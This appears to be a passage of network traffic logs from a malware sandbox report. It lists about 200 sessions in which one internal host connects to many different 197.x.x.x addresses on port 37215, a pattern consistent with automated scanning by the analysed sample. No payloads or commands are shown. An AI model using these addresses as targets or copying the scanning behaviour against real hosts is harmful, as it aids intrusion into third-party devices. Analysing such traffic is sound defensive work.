                                                                            17544192.168.2.1539974197.211.12.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17545192.168.2.1558348197.158.150.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17546192.168.2.1560724197.19.98.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17547192.168.2.1548398197.105.3.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17548192.168.2.1558436197.104.41.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17549192.168.2.1549412197.114.22.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17550192.168.2.1545096197.18.32.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17551192.168.2.1556598197.197.54.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17552192.168.2.1550382197.1.250.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17553192.168.2.1554202197.11.69.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17554192.168.2.1539662197.182.177.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17555192.168.2.1534348197.227.43.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17556192.168.2.1537786197.77.74.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17557192.168.2.1557978197.134.21.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17558192.168.2.1547308197.0.241.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17559192.168.2.1536608197.242.37.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17560192.168.2.1533128197.219.123.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17561192.168.2.1543884197.146.69.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17562192.168.2.1535190197.220.208.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17563192.168.2.1545194197.231.251.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17564192.168.2.1538136197.249.252.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17565192.168.2.1533470197.223.89.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17566192.168.2.1544052197.207.73.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17567192.168.2.1560396197.67.148.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17568192.168.2.1553132197.239.0.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17569192.168.2.1552316197.134.245.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17570192.168.2.1533698197.123.98.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17571192.168.2.1551336197.66.175.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17572192.168.2.1546176197.192.252.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17573192.168.2.1559814197.67.96.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17574192.168.2.1538948197.53.94.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17575192.168.2.1552814197.177.174.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17576192.168.2.1536798197.166.188.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17577192.168.2.1544534197.193.208.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17578192.168.2.1535602197.148.238.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17579192.168.2.1548612197.120.106.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17580192.168.2.1535038197.234.68.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17581192.168.2.1538086197.117.208.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17582192.168.2.1538450197.112.207.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17583192.168.2.1543340197.106.197.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17584192.168.2.1534076197.246.208.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17585192.168.2.1545878197.109.80.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17586192.168.2.1549924197.36.170.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17587192.168.2.1545972197.216.18.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17588192.168.2.1559342197.132.212.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17589192.168.2.1541042197.23.143.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17590192.168.2.1549578197.73.112.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17591192.168.2.1556548197.200.200.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17592192.168.2.1555570197.14.218.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17593192.168.2.1540238197.83.244.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17594192.168.2.1551440197.89.11.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17595192.168.2.1533142197.217.106.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17596192.168.2.1540130197.115.245.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17597192.168.2.1534372197.73.170.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17598192.168.2.1550232197.211.71.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17599192.168.2.1547628197.202.98.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17600192.168.2.1540636197.3.68.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17601192.168.2.1554516197.154.85.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17602192.168.2.1543172197.69.94.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17603192.168.2.1557144197.78.96.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17604192.168.2.1549336197.58.179.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17605192.168.2.1537956197.232.178.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17606192.168.2.1548054197.24.254.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17607192.168.2.1534962197.69.162.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17608192.168.2.1535854197.17.9.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17609192.168.2.1537670197.0.47.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17610192.168.2.1537818197.66.140.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17611192.168.2.1537132197.39.5.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17612192.168.2.1551912197.26.193.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17613192.168.2.1533800197.167.139.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17614192.168.2.1532992197.159.101.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17615192.168.2.1559470197.103.178.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17616192.168.2.1537092197.72.6.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17617192.168.2.1539628197.119.222.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17618192.168.2.1542072197.17.117.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17619192.168.2.1536332197.101.103.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17620192.168.2.1540392197.80.26.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17621192.168.2.1551702197.194.24.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17622192.168.2.1536716197.63.251.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17623192.168.2.1560074197.169.225.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17624192.168.2.1557358197.196.174.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17625192.168.2.1540392197.253.135.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17626192.168.2.1560560197.56.36.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17627192.168.2.1535590197.209.75.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17628192.168.2.1537168197.161.139.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17629192.168.2.1536886197.205.42.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17630192.168.2.1546534197.21.172.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17631192.168.2.1542976197.78.31.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17632192.168.2.1534440197.155.233.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17633192.168.2.1555500197.32.133.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17634192.168.2.1534314197.137.181.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17635192.168.2.1537400197.122.9.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17636192.168.2.1537752197.40.247.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17637192.168.2.1546014197.111.150.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17638192.168.2.1551628197.59.29.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17639192.168.2.1533902197.138.166.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17640192.168.2.1533330197.56.249.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17641192.168.2.1550712197.13.115.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17642192.168.2.1546192197.86.147.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17643192.168.2.1540880197.127.83.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17644192.168.2.1558806197.10.153.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17645192.168.2.1558536197.103.66.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17646192.168.2.1558244197.80.11.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17647192.168.2.1550366197.229.27.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17648192.168.2.1554534197.17.18.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17649192.168.2.1533698197.73.97.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17650192.168.2.1543224197.64.132.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17651192.168.2.1552376197.145.220.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17652192.168.2.1560006197.234.93.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17653192.168.2.1542294197.218.65.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17654192.168.2.1553836197.124.67.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17655192.168.2.1557800197.171.186.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17656192.168.2.1558392197.169.196.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17657192.168.2.1538650197.74.25.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17658192.168.2.1550004197.201.121.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17659192.168.2.1533124197.186.127.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17660192.168.2.1556186197.79.241.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17661192.168.2.1541192197.237.155.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17662192.168.2.1558602197.35.151.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17663192.168.2.1535720197.102.110.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17664192.168.2.1553176197.163.144.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17665192.168.2.1540904197.64.105.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17666192.168.2.1560244197.136.232.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17667192.168.2.1552680197.176.65.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17668192.168.2.1536484197.53.200.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17669192.168.2.1557082197.0.55.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17670192.168.2.1555140197.140.26.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17671192.168.2.1550852197.32.205.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17672192.168.2.1536804197.28.22.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17673192.168.2.1548150197.138.176.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17674192.168.2.1557022197.236.209.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17675192.168.2.1558452197.13.16.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17676192.168.2.1556734197.62.72.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17677192.168.2.1553862197.90.1.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17678192.168.2.1559538197.19.73.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17679192.168.2.1547404197.146.28.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17680192.168.2.1544878197.184.6.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17681192.168.2.1546722197.19.63.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17682192.168.2.1533460197.83.175.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17683192.168.2.1558314197.137.59.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17684192.168.2.1541222197.160.235.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17685192.168.2.1546690197.149.234.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17686192.168.2.1537556197.29.228.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17687192.168.2.1556894197.223.52.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17688192.168.2.1556440197.171.123.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17689192.168.2.1554764197.42.127.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17690192.168.2.1533866197.140.227.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17691192.168.2.1550004197.219.35.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17692192.168.2.1544614197.37.2.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17693192.168.2.1547430197.6.36.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17694192.168.2.1536702197.143.181.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17695192.168.2.1548810197.88.156.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17696192.168.2.1554518197.45.104.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17697192.168.2.1559014197.81.150.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17698192.168.2.1533012197.177.55.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17699192.168.2.1546898197.93.71.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17700192.168.2.1546402197.47.94.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17701192.168.2.1543444197.125.239.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17702192.168.2.1538508197.67.39.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17703192.168.2.1548676197.128.225.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17704192.168.2.1554710197.230.213.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17705192.168.2.1553398197.4.118.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17706192.168.2.1549872197.128.238.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17707192.168.2.1542810197.247.158.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17708192.168.2.1547718197.20.40.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17709192.168.2.1550488197.133.163.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17710192.168.2.1548446197.110.104.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17711192.168.2.1538696197.42.3.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17712192.168.2.1538562197.9.99.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17713192.168.2.1544386197.24.208.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17714192.168.2.1560950197.240.130.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17715192.168.2.1533972197.51.12.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17716192.168.2.1558546197.248.223.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17717192.168.2.1550162197.130.235.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17718192.168.2.1548734197.43.226.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17719192.168.2.1535252197.210.32.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17720192.168.2.1539448197.137.41.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17721192.168.2.1559546197.112.101.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17722192.168.2.1535278197.175.245.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17723192.168.2.1543416197.165.98.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17724192.168.2.1560202197.16.106.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17725192.168.2.1552378197.135.34.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17726192.168.2.1554402197.183.116.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17727192.168.2.1545318197.20.112.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17728192.168.2.1544000197.192.221.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17729192.168.2.1547900197.150.228.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17730192.168.2.1560212197.237.48.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17731192.168.2.1552256197.242.19.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17732192.168.2.1547794197.77.63.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17733192.168.2.1536092197.94.150.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17734192.168.2.1554340197.14.134.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17735192.168.2.1537862197.86.103.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17736192.168.2.1544204197.160.212.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17737192.168.2.1558196197.166.2.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17738192.168.2.1556988197.111.169.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17739192.168.2.1544520197.62.101.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17740192.168.2.1548450197.186.149.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17741192.168.2.1557448197.148.190.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17742192.168.2.1542386197.45.1.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17743192.168.2.1542546197.39.202.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
